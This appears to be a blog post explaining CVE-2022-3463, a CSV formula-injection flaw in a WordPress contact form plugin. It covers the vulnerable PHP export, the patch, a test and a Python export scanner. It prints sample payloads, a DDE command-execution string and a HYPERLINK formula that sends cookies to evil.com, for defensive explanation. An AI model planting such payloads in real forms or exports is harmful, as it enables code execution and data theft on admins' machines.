CVE-2022-3463 - How Contact Form Plugin’s CSV Export Can Inject Danger into Your Business

The popular Contact Form Plugin for WordPress helps thousands of websites collect user data safely—or so you’d hope. But before version 4.3.13, it had a sneaky vulnerability that let attackers smuggle dangerous commands right into your spreadsheet: CSV Injection, also known as Formula Injection.

If you manage submissions and download your CSV reports to open in Excel, LibreOffice, or another spreadsheet app, you could be opening the door to a hack. In this long read, I’ll break down how CVE-2022-3463 works, the real risks, and how you can test and secure your site.

What is CSV Injection?

CSV Injection happens when unsanitized user input gets exported into a CSV file. Modern spreadsheets don’t just display numbers and text—they execute anything that looks like a formula. If an attacker submits something like =cmd|'/C calc'!A into your contact form, and you open your submission file in Excel, this can trigger dangerous actions.

Typical spreadsheet formula starters, the characters a cell must not begin with:

- = (equals sign)
- + (plus sign)
- - (minus sign)
- @ (at sign)

Opening a malicious CSV could run commands, steal data, or infect your computer.

How CVE-2022-3463 Happens in Contact Form Plugin

Before version 4.3.13, Contact Form Plugin did NOT properly validate or escape form entries when exporting them to a CSV file. That means any form field—name, message, email—could include a malicious payload.

Let’s say a bad actor sends this as their "name" field:

=HYPERLINK("http://evil.com?cookie="&CMD|'; /C calc'!A1)

You, as an admin, later export form submissions and open the CSV in Excel. Excel sees the field starting with =, and treats it as a formula. If you have any macros or dangerous settings enabled, this formula can run code, call out to malicious URLs, or worse.

Suppose your contact form collects "Name", "Email", and "Message". An attacker submits:

| Name                          | Email           | Message                |
|-------------------------------|-----------------|------------------------|
| =cmd|'/C calc'!A             | evil@badguy.com | Hello site admin!      |

You export your form entries as CSV and see:

"=cmd|'/C calc'!A","evil@badguy.com","Hello site admin!"

Upon opening this in some versions of Excel on Windows, it opens Calculator—but in a real attack, this could run powershell, fetch malware, or send your local files to an attacker.

Before the fix, the CSV export might have looked like this (PHP):

// Vulnerable export: every field is written verbatim, so a value that starts
// with = (or +, -, @) reaches the spreadsheet as a formula.
foreach ($rows as $row) {
    echo '"' . implode('","', $row) . "\"\n";
}

The fields are dumped directly. No check for dangerous characters. No escaping.

How the Patch Works

From version 4.3.13 onward, the plugin escapes dangerous leading characters in form fields before they are exported to CSV.

A basic mitigation (simplified) looks like:

function escape_csv_field($field) {
    // OWASP's CSV Injection guidance lists =, +, -, @, tab and carriage return
    // as formula triggers when they begin a cell; neutralize the cell by
    // prefixing an apostrophe so the spreadsheet reads it as text.
    if (preg_match('/^[=+\-@\t\r]/', $field)) {
        $field = "'" . $field; // prepend single quote
    }
    // Double any embedded double quote so the quoted CSV field stays well-formed.
    return str_replace('"', '""', $field);
}

// When exporting each field:
foreach ($rows as $row) {
    $clean_row = array_map('escape_csv_field', $row);
    echo '"' . implode('","', $clean_row) . "\"\n";
}

Adding a single quote ' in front makes Excel treat the field as plain text, not a formula.

Responsible Disclosure & References

- Official plugin page: Contact Form Plugin – WordPress
- Security advisory: WPScan Advisory
- Original CVE Record
- General background: CSV Injection Cheat Sheet — PortSwigger

How Can You Test for This?

1. Try to Submit a Malicious Field
Submit =2+5 as your name or message.

2. Export as CSV and Open it in Excel
If Excel displays a result of 7 instead of =2+5, you are vulnerable!

- Update to version 4.3.13 or later of the Contact Form Plugin immediately.
- If you must handle CSV exports from unpatched plugins, do NOT open them in Excel or LibreOffice unless you’ve sanitized the data.
- Consider viewing CSVs in a text editor for review first.
- Use OWASP recommendations for handling CSV files.
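As an added example (not the plugin's code or anything from the original post), here is a Python triage script for the "review first" step: it scans a downloaded export before it is opened in a spreadsheet, reports every cell that begins with one of the formula-trigger characters from OWASP's CSV Injection guidance, and writes a neutralized copy using the same leading-apostrophe approach as the patch. The sample export is constructed; the `scan_csv` function and its row numbering are assumptions of this example.

```python
import csv
import io

# Characters OWASP's CSV Injection guidance lists as formula triggers when
# they begin a cell; the plugin's regex covers the first four.
FORMULA_STARTERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell rather than display it."""
    return cell.startswith(FORMULA_STARTERS)


def neutralize(cell: str) -> str:
    """Prefix an apostrophe so the cell is read as text (same idea as the patch)."""
    return "'" + cell if is_formula_cell(cell) else cell


def scan_csv(text: str):
    """Scan an export. Returns (findings, sanitized_csv); each finding is
    (row_number, column_index, offending_value), with row numbers from 1."""
    rows = list(csv.reader(io.StringIO(text, newline="")))
    findings = []
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for r, row in enumerate(rows, start=1):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                findings.append((r, c, cell))
        writer.writerow([neutralize(cell) for cell in row])
    return findings, out.getvalue()


# Constructed sample export: header plus three submissions. Row 4 shows the
# trade-off of the apostrophe fix: a harmless "-5 degrees" is flagged too.
SAMPLE_EXPORT = (
    '"Name","Email","Message"\n'
    '"=cmd|\'/C calc\'!A","evil@badguy.com","Hello site admin!"\n'
    '"Alice","alice@example.com","Thanks for the quick reply"\n'
    '"@SUM(1+1)","bob@example.com","-5 degrees here"\n'
)

if __name__ == "__main__":
    found, cleaned = scan_csv(SAMPLE_EXPORT)
    for row_no, col, value in found:
        print(f"row {row_no}, column {col}: {value!r}")
    print("--- sanitized copy ---")
    print(cleaned, end="")
```

Because the neutralized copy never begins a cell with a trigger character, running the scan again over it reports nothing, which is a quick way to confirm a sanitized export before handing it to a spreadsheet.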

Final Thoughts

CVE-2022-3463 is a great reminder: user input is never safe, not even in a simple contact form. One careless click can mean a disaster for your device or even your whole business. Always keep your plugins up-to-date, and never trust input—especially when it could end up as an executable formula!

Timeline

Published on: 11/07/2022 10:15:00 UTC
Last modified on: 11/09/2022 20:09:00 UTC